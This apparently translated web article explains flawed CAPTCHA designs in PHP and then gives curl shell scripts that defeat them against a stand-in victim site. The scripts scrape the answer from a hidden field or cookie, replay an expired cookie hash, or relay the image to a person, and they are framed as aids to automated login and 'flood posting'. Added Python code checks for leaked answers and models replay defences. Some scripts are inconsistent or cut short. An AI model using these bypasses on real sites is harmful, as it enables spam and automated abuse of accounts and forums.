Verification Code cracking technology

Source: Internet
Author: User

A verification code is an image containing a string of randomly generated numbers or symbols, with some interference pixels added to the image (to prevent OCR). The user identifies the verification code with the naked eye, enters it into a form and submits it to the website for verification. A function can be used only after the verification succeeds. Many websites adopt verification codes to prevent robots from automatically registering, logging on, and bumping.
There are problems with the implementation of many verification codes. For example, some provide the verification code directly in the webpage or in cookies.
Example of a verification code placed in the webpage:
CODE:
<?php
/*
 * Filename: authpage.php
 * Author: huuworm
 * Date: 2003-04-28
 * @Copyleft huuworm.org
 */
srand((double)microtime() * 1000000);

// Verify whether the user input is consistent with the verification code
// ($HTTP_POST_VARS is the legacy long-array name for $_POST, removed in PHP 5.4)
if (isset($HTTP_POST_VARS['authinput']))
{
    if (strcmp($HTTP_POST_VARS['authnum'], $HTTP_POST_VARS['authinput']) == 0)
        echo "Verification Successful!";
    else
        echo "Verification Failed!";
}

// Generate a new four-digit integer verification code
while (($authnum = rand() % 10000) < 1000);
?>
<form action=authpage.php method=post>
<table>
Enter the verification code: <input type=text name=authinput style="width: 80px"><br>
<input type=submit name="verify" value="submit verification code">
<input type=hidden name=authnum value=<?php echo $authnum; ?>>

</table>
</form>
In the preceding example, the verification code is stored directly in the page. You only need to download the page and read the verification code value from it to get past the restriction.
CODE:
#!/bin/sh
curl http://www.vicitm.org/authpage.php -o grep.txt
authnum=`grep '<input type=hidden name=authnum value=[[:digit:]]\{4\}>' grep.txt | sed -e 's/[^0-9]//g'` # obtain the authnum in the webpage
curl http://www.vicitm.org/authpage.php -d name=hacker -d submit="verify" -d authnum=$authnum
CODE:
session_register("authnum");
$authnum = strval(rand(1111, 9999));
setcookie("authnum", $authnum);
...
<input type=text name=authnum maxlength=4>
...
if ($number != $login_check_number || empty($number))
{
    print("Incorrect verification code!");
    die();
}
The second type is smarter than the previous one: the verification code value is stored in the user's cookies. However, because cookies are readable and writable by users, it is also easily broken through.
CODE:
#!/bin/sh
username=hacker
password=hackme
curl http://www.vicitm.org/index.php -c common_cookie # accept the initial cookies of the server
curl http://www.vicitm.org/get_code.php -c $username.cook -b common_cookie # get the verification code from cookies
authnum=`grep authnum $username.cook | cut -f7`
curl http://www.victim.org/login.php
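Both flawed designs above hand the expected answer to the client. As an added example (not code from the original page), the following Python check can run in a site's own test suite to flag any response that exposes the expected code in a form field or a Set-Cookie header. The function names, the sample responses and the answer 4821 are constructed for illustration.

```python
from html.parser import HTMLParser
from http.cookies import SimpleCookie


class _Inputs(HTMLParser):
    """Collect name -> value for every <input> element that carries a value."""

    def __init__(self):
        super().__init__()
        self.values = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            a = dict(attrs)
            if a.get("value") is not None:
                self.values[a.get("name", "?")] = a["value"]


def find_answer_leaks(expected_code, html, set_cookie_headers):
    """Return every client-readable place that holds the expected answer."""
    leaks = []
    parser = _Inputs()
    parser.feed(html)
    for name, value in parser.values.items():
        if value.strip() == expected_code:
            leaks.append(f"form field {name}")
    for header in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(header)
        for name, morsel in jar.items():
            if morsel.value == expected_code:
                leaks.append(f"cookie {name}")
    return leaks


# Constructed responses modelled on the page's two samples (4821 is made up).
PAGE_SAMPLE_1 = ('<form action=authpage.php method=post>'
                 '<input type=text name=authinput>'
                 '<input type=hidden name=authnum value=4821></form>')
COOKIE_SAMPLE_2 = ["authnum=4821; path=/"]
# Constructed response that keeps the answer on the server.
SAFE_RESPONSE = ('<form><input type=text name=authnum maxlength=4></form>',
                 ["PHPSESSID=0f3a9c; path=/; HttpOnly"])
```
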
A more advanced verification code. (This forum seems to work this way ....)
One type of verification code is more advanced than the preceding two types. It uses the following algorithm:
1. The server generates a random hash.
2. An algorithm (irreversible, difficult to crack) converts the hash into a verification code number, which is then rendered as an image.
3. The hash is sent to the client in a cookie.
4. The customer reads the verification code from the image and enters it to log on. The server checks f(hash) = verification code.
Features: because attackers do not know the verification code encoding algorithm used by the server, they cannot directly parse the hash transferred from the server.
To deal with this verification code, we can use the "expired cookies" method, that is, save a specific cookie from the server and write down the corresponding verification code. Each time a verification message is sent, the cookies sent from the server are forcibly discarded and the saved cookie and verification code are used instead, just as if a phone recharge card could be used multiple times. For example:
Download a verification code image from the server:
curl http://www.victim.org/get_code.php -c cookie -o auth.png
Read it manually to get $savecookie (the hash in the cookie file) and $authnum (the verification code).
When the robot goes through verification, the hash given by the server is discarded, and $savecookie and $authnum are forcibly used instead.
CODE:
savecookie=294b506f05f896dcbb3a0dde86a5e36c
num=7701
username=hacker
password=hackme
curl http://www.victim.org/index.php -c $username.cookie # get the initialization cookies and session id
grep -v authhash $username.cookie > tmp.$username # discard the hash that the server gives you
echo "www.victim.org FALSE / FALSE 0 hash $savecookie" >> tmp.$username # forcibly use the expired hash and verification code
mv tmp.$username $username.cookie
curl http://www.victim.org/login.php -b $username.cookie -c $username.cookie -d username=$username -d password=$password -d authnum=$num # use the expired verification code to log in
# Login successful, flood posting begins ......
The highest-level verification code.
It uses the following method:
1. The server generates a random hash based on user information (IP address, SID, etc.).
2. An algorithm (irreversible, difficult to crack) converts the hash into verification code numbers.
3. The hash is not sent to the client. It is saved to the server's local database (generally SESSIONS, information about user IP addresses, etc.) and pointed to by a serial number seq. (This seq can also be a session id.)
4. Seq is sent to the client as a cookie.
5. The customer reads the verification code from the image and enters it.
6. Server verification method: the server does not check f(hash) = verification code, but reads the expected verification code from the database. If the user input is the same as the expected value, the verification is successful. Some servers may also verify the relationship between seq and session id for further verification.
7. Once the user performs a verification operation or obtains the verification code again, the server replaces the hash value in the database with a new one, and the old value expires.
Features:
* Expiration: because the server only keeps the currently expected verification code in its database, an "expired" verification code cannot be used (it has been replaced by the new verification code).
* High strength: only seq is sent, and the hash is stored locally on the server. Therefore, it is extremely difficult to decrypt the f(hash) function.
Weaknesses:
* OCR (optical recognition)
* seq hijacking
* "Verification code" DoS (repeated requests against some seq, causing some users to fail to perform normal verification)
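The difference between the cookie-hash scheme and this server-side scheme can be modelled directly. The following Python model is an added example, not code from the original page: f() is an assumed keyed-hash stand-in for the server's irreversible function, and the class and function names are hypothetical. It shows a solved (hash, code) pair verifying repeatedly under the stateless scheme, while the stored scheme accepts a seq once and then expires it.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = b"constructed-demo-key"  # assumption: secret behind the server's f()


def f(token):
    """Assumed stand-in for f(hash): keyed hash reduced to a 4-digit code."""
    digest = hmac.new(SERVER_KEY, token.encode(), hashlib.sha256).digest()
    return str(int.from_bytes(digest[:4], "big") % 9000 + 1000)


class StatelessCaptcha:
    """Cookie-hash scheme: the server keeps nothing and checks f(hash) == input."""

    def issue(self):
        token = secrets.token_hex(16)
        return token, f(token)  # (hash cookie, code drawn in the image)

    def verify(self, cookie_hash, user_input):
        return hmac.compare_digest(f(cookie_hash), user_input)


class StoredCaptcha:
    """Server-side scheme: the client holds only seq; the expected code is stored."""

    def __init__(self):
        self._expected = {}  # seq -> expected code

    def issue(self, seq=None):
        seq = seq or secrets.token_hex(16)
        self._expected[seq] = f(secrets.token_hex(16))  # replaces any older code
        return seq, self._expected[seq]

    def verify(self, seq, user_input):
        expected = self._expected.pop(seq, None)  # any attempt expires the code
        return expected is not None and hmac.compare_digest(expected, user_input)


def replay_results():
    """Solve one challenge per scheme, then submit the same pair twice."""
    stateless, stored = StatelessCaptcha(), StoredCaptcha()
    cookie_hash, code = stateless.issue()
    seq, stored_code = stored.issue()
    return ([stateless.verify(cookie_hash, code) for _ in range(2)],
            [stored.verify(seq, stored_code) for _ in range(2)])
```

Because verify() removes the stored code on every attempt, a wrong guess also forces a fresh challenge, which is the expiry behaviour the last step of the list describes.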
There is no good way to deal with this verification code. The easy way is to download the verification code image, display it to the user, and then log in. This is applicable when verification is performed only once, such as verification during login.
CODE:
curl http://www.victim.org/get_code.php -o validate.png -c validcode_cookie # get the verification code image and the corresponding seq
seq=`grep seq validcode_cookie | cut -f7`
echo -n "Enter the verification code in validate.png: "
read valid_number # enter the verification code
# Log in and perform some automated operations, such as flood posting.
